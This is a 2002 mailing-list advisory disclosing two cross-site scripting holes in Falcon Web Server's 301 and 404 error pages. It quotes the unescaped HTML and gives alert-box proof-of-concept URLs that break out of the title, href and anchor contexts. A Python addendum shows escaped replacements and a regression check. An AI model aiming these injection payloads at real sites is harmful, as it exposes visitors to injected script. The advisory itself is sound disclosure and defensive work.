From: Matthew Murphy (mattmurphy_at_kc.rr.com)
Date: Thu Aug 08 2002 - 18:31:20 CDT

    From Developer:

    "Falcon Web Server is running under Windows NT/2000/XP as well as Windows
    95/98. It supports ISAPI and WinCGI, and it is a fully functional web
    server which is capable of running a small / medium scale website of about
    50-80 hits per minute. The real advantage of Falcon Web Server is the
    ability to run on a desktop computer with almost the same functionality as
    large-scale web servers like MS IIS and Apache."

    A lack of input sanitation in the error message output of this server makes
    it susceptible to two cross-site scripting vulnerabilities:

    * An issue in the way the server handles 301 messages when a file is not
    found, and the request is not terminated by a slash. Falcon simply adds a
    slash to the request URI, and sends back a 301 with the following entity:

    <html><head><title>/<SCRIPT>alert("xss")</SCRIPT>/</title></head><body>
    Redirecting browser to <a href="/<SCRIPT>alert("xss")</SCRIPT>/">/<SCRIPT>alert("xss")</SCRIPT>/</a><br>
    If nothing happens click the link above.</body></html>

    * An issue in the way the server handles 404 messages when a file/folder is
    not found, and the necessary slash has been added (entity below):

    <html><head><title>HTTP/1.0 404 Not
    Found</title></head><body><h1>/<SCRIPT>alert("xss")</SCRIPT>/index.html Not
    Found</h1><p>Cannot locate the requested file.</body></html>

    Examples:

    * 301 Message XSS

    Closing TITLE tag:
    http://localhost/%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
    Closing A HREF:
    http://localhost/%22%3cscript%3ealert(%22xss%22)%3c/script%3e
    Closing A tag:
    http://localhost/%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

    * 404 Message XSS

    http://localhost/%3cscript%3ealert(%22xss%22)%3c/script%3e/

    The 301 examples will simply add a slash and pass it on to the browser,
    which then raises a 404, exploiting that vulnerability as well (although the
    301 exploits will cause some useless HTML to be added on).

    "The reason the mainstream is thought
    of as a stream is because it is
    so shallow."
                         - Author Unknown
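The escaping the two entities above lack, as an added example that is not part of the original post or of the Falcon Web Server code: the 301 and 404 templates quoted in the advisory rendered once as described (path interpolated raw) and once with the request path encoded for each context, followed by a regression check a maintainer can run on generated error pages. Function names and the sample path are assumptions.

```python
import html
from urllib.parse import quote

# Constructed sample request path: the advisory's %3cscript%3e... URL after
# the server has percent-decoded it (attacker-controlled input).
SAMPLE_PATH = '/<SCRIPT>alert("xss")</SCRIPT>'


def vulnerable_redirect_entity(path: str) -> str:
    """301 entity as the advisory shows it: the decoded request URI goes
    unescaped into <title>, into the href attribute and into the link text."""
    target = path + "/"
    return ("<html><head><title>" + target + "</title></head><body>"
            'Redirecting browser to <a href="' + target + '">' + target +
            "</a><br>If nothing happens click the link above.</body></html>")


def safe_redirect_entity(path: str) -> str:
    """Hardened form (written here, not the vendor's fix): percent-encode the
    path for the href and HTML-escape every text and attribute context,
    quotes included, so the URI can neither close the attribute nor add tags."""
    target = path + "/"
    href = html.escape(quote(target, safe="/"), quote=True)
    text = html.escape(target, quote=True)
    return ("<html><head><title>" + text + "</title></head><body>"
            'Redirecting browser to <a href="' + href + '">' + text +
            "</a><br>If nothing happens click the link above.</body></html>")


def safe_not_found_entity(path: str) -> str:
    """404 entity from the advisory with the same escaping applied to the
    path that lands inside <h1>."""
    shown = html.escape(path + "/index.html", quote=True)
    return ("<html><head><title>HTTP/1.0 404 Not Found</title></head><body>"
            "<h1>" + shown + " Not Found</h1>"
            "<p>Cannot locate the requested file.</body></html>")


def markup_count_is_fixed(render, hostile_path: str) -> bool:
    """Regression check: an error page must contain exactly as many '<'
    characters for a hostile path as for a benign one, i.e. the request
    path may contribute text but never new markup."""
    benign = render("/missing-page")
    return benign.count("<") == render(hostile_path).count("<")
```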